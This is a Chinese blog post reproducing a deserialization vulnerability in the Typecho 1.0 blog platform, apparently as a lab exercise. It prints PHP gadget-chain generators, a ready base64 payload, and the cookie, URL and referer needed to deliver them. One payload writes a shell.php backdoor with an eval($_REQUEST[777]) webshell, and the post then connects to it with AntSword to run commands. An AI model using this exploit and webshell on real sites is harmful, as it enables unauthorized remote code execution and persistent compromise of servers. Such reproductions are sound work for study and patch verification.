typecho反序列化漏洞复现

最新推荐文章于 2024-01-28 09:06:37 发布
最新推荐文章于 2024-01-28 09:06:37 发布
阅读量302 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71090536/article/details/132698691
版权

1. 安装好后的 typecho 网站界面如图所示:

2. 查看源码,发现信息

__函数名:是魔术方法,可以在特定的时间自动调用

call_user_func():回调函数,是危险函数,可利用其构造后门

有两个参数:第一个参数是函数的名字;第二个参数是函数的参数

 通俗解释如下代码为:call_user_func()函数 调用 assert() 函数,将 "phpinfo()" 这个参数给到 assert() 函数中,下方代码也可写为:assert("phpinfo()");

<?php
  call_user_func('assert',"phpinfo()");
?>

3. 在访问 typecho_1.0(14.10.10)_unserialize_phpinfo.php 页面时,找到 base64 编码的字符串

// typecho_1.0(14.10.10)_unserialize_phpinfo.php
<?php
class Typecho_Feed{
	const RSS1 = 'RSS 1.0';
	const RSS2 = 'RSS 2.0';
	const ATOM1 = 'ATOM 1.0';
   	const DATE_RFC822 = 'r';
	const DATE_W3CDTF = 'c';
	const EOL = "\n";
	private $_type;
	private $_items;
	
	public function __construct(){
		$this->_type = $this::RSS2;
		$this->_items[0] = array(
			'title' => '1',
			'link' => '1',
			'date' => 1508895132,
			'category' => array(new Typecho_Request()),
			'author' => new Typecho_Request(),
		);
	}
}

class Typecho_Request{
	private $_params = array();
	private $_filter = array();

	public function __construct(){
		$this->_params['screenName'] = 'phpinfo()';
		$this->_filter[0] = 'assert';
    }
}

$exp = array(
	'adapter' => new Typecho_Feed(),
	'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

 将其字符串信息保存

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

4. 利用漏洞点:install.php?finish=

   访问 phpinfo 界面

5. getshell

URL地址:install.php?finish=

referer:服务器 IP 地址

cookie:__typecho_config=恶意代码字段

6. 上方 cookie 后的恶意代码字段为 typecho_1.0(14.10.10)_unserialize_fputs.php

    访问该 php 文件 得到一串 base64 编码的 恶意代码

// typecho_1.0(14.10.10)_unserialize_fputs.php
<?php
class Typecho_Feed{
	const RSS1 = 'RSS 1.0';
	const RSS2 = 'RSS 2.0';
	const ATOM1 = 'ATOM 1.0';
   	const DATE_RFC822 = 'r';
	const DATE_W3CDTF = 'c';
	const EOL = "\n";
	private $_type;
	private $_items;
	
	public function __construct(){
		$this->_type = $this::RSS2;
		$this->_items[0] = array(
			'title' => '1',
			'link' => '1',
			'date' => 1508895132,
			'category' => array(new Typecho_Request()),
			'author' => new Typecho_Request(),
		);
	}
}

class Typecho_Request{
	private $_params = array();
	private $_filter = array();

	public function __construct(){
		$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";
		$this->_filter[0] = 'assert';
    }
}

$exp = array(
	'adapter' => new Typecho_Feed(),
	'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

7.  蚁剑链接

8. 链接成功后,可在蚁剑虚拟终端中执行命令。

梅子酸糖803
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
typechov漏洞.zip
08-10
typecho框架漏洞-php反序列化任意代码执行,附加poc-exp,适合理解序列化漏洞
漏洞分析之Typecho二连爆
hl1293348082的专栏
04-04 1967
这段时间 Typecho 在十几天之内连续爆了两个最高可 getshell 的洞,先是 SSRF 可打内网,再是反序列化直接前台 getshell ……安全性这方面堪忧…… 跟着师傅们的文章,简单地分析一下这两次漏洞,第二个反序列化的洞的溯源思路值得学习一波~ 虽然很多大号都分析过这个漏洞,写的也很详细,我作为一个初学者自己分析学习一下也是很有必要的,官方人员已经对这些漏洞进行的及时的修补并且推出了最新的版本,如果有用到这个博客的同学赶紧升级。 Typecho 1.0 (14.10.10) —— SS
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 2012
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
Typecho框架漏洞
weixin_62693307的博客
11-19 453
这里说的漏洞是xss漏洞,学过渗透的应该都学过,我在这里就不过多阐述了,下面我们直接进入正题。然后再次访问时即可弹出一个框,这里学过xss漏洞的应该知道是什么意思了。这里说的框架漏洞只适用于1.2.0版本及以下的版本。然后等管理员访问评论是会使得js文件也给运行起来。然后这里就像上面反弹xss代码一样书写网址。生成的一句话目录路径可以自己改,上面的如下。在404.php中,这样路径的问题就解决了。这样我们就可以用蚁剑或其他工具连接后台了。
Typecho代码审计-反序列化漏洞复现(超详细!!!)
小小小屿屿屿的博客
12-27 2444
本文以Typecho为靶场,通过代码审计,复现反序列化漏洞
typecho-1.1-15.5.12-beta.zip
03-17
Typecho 1.1-15.5.12 Beta 版本中的反序列化漏洞详解》 在IT安全领域,程序的漏洞是开发者和安全专家关注的重点。本文将详细探讨“typecho-1.1-15.5.12-beta.zip”压缩包中的Typecho 1.1版本至15.5.12 Beta版本中...
typecho主题模板,typecho后台模板
01-06
标题中的“typecho主题模板,typecho后台模板”指的是Typecho博客系统使用的界面设计和布局样式,即Typecho的前端展示部分。Typecho是一个轻量级的开源博客平台,允许用户自定义主题来改变博客的外观和用户体验。...
Typecho博客收费主题,handsome 6.0
06-15
标题中的“Typecho博客收费主题,handsome 6.0”指的是一个专为Typecho博客平台设计的付费主题,版本号为6.0。Typecho是一款开源、轻量级的博客系统,它允许用户通过简单的界面创建和管理自己的博客。"handsome"是这...
精美扁平化自适应typecho后台主题Fresh.zip
01-17
精美扁平化自适应typecho后台主题Fresh 曾用名:PrettyFresh主题采用了目前最流行的Bootstrap前端开发框架与typecho进行深度适配;主题在继承typecho一贯简单高效风格的同时让其更加贴合现代年轻用户的审美。自适应+...
反序列化typecho2靶场漏洞-代码审计全过程(超详细)
最新发布
qq_59020256的博客
01-28 1147
php· }
Typecho反序列化漏洞寻找思路
问彡心的博客
08-01 1087
Typecho靶场一次成功的渗透思路,一定不能错过
typecho存储型xss漏洞复现
m0_73299839的博客
07-26 363
之前搭博客的时候使用的是typecho,然后有看到文章说typecho
typecho 1.0 反序列化漏洞
snaca_boy的博客
12-15 116
进行验证,成功获取phpinfo 页面。代码经过这里时,需要满足几个条件。在116~120行的代码中,成功执行,查看shell文件。用于base64 值解码。这是一个当前类的私有变量,的值生成一个适配器对象。的值进行字符串拼接,值 等于 该类的常量。为一个类时,而且不存在。魔术方法,所以全局搜索。的属性是可控的,所以。进行页面验证,成功执行。
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5182
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
typecho反序列化漏洞(详细过程)
qq_61991235的博客
03-13 1791
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
CVE-2018-18753 Typecho 反序列化漏洞 分析复现
2301_77512689的博客
04-21 425
漏洞概述:typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意 PHP 代码。影响版本:typecho1.0(14.10.10)
typecho_1.0_14.10.10_反序列化_漏洞
weixin_42786460的博客
09-10 239
typecho_1.0_14.10.10_反序列化_漏洞
typecho markdown
08-16
Typecho 中使用 Markdown,你可以通过以下步骤进行设置: 1. 安装 Markdown 插件:首先,你需要安装 Typecho 的 Markdown 插件。你可以在 Typecho 的官方插件市场或开发者社区中找到适合的 Markdown 插件,然后将其下载到 Typecho 的插件目录中(一般是 `usr/plugins` 目录)。 2. 启用 Markdown 插件:在 Typecho 的后台管理界面中,进入「控制台」-「插件」页面,找到已下载的 Markdown 插件,点击「启用」按钮启用该插件。启用后,Typecho 的编辑器将切换为支持 Markdown 语法的编辑器。 3. 编辑文章使用 Markdown:现在你可以在 Typecho 的文章编辑页面中使用 Markdown 语法来编写内容了。Markdown 是一种简单、直观的文本标记语言,可以快速排版和格式化文章。 4. 预览和发布文章:在编辑过程中,你可以通过点击编辑器上方的「预览」按钮来查看 Markdown 格式的文章预览效果。当编辑完成后,点击「发布」按钮来将文章保存并发布到你的博客中。 使用 Markdown 可以方便地进行文本排版、插入链接、插入图片、添加代码块等操作,同时也可以提高写作效率。你可以参考 Markdown 的语法规则和常用标记来使用它在 Typecho 中编写博客内容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值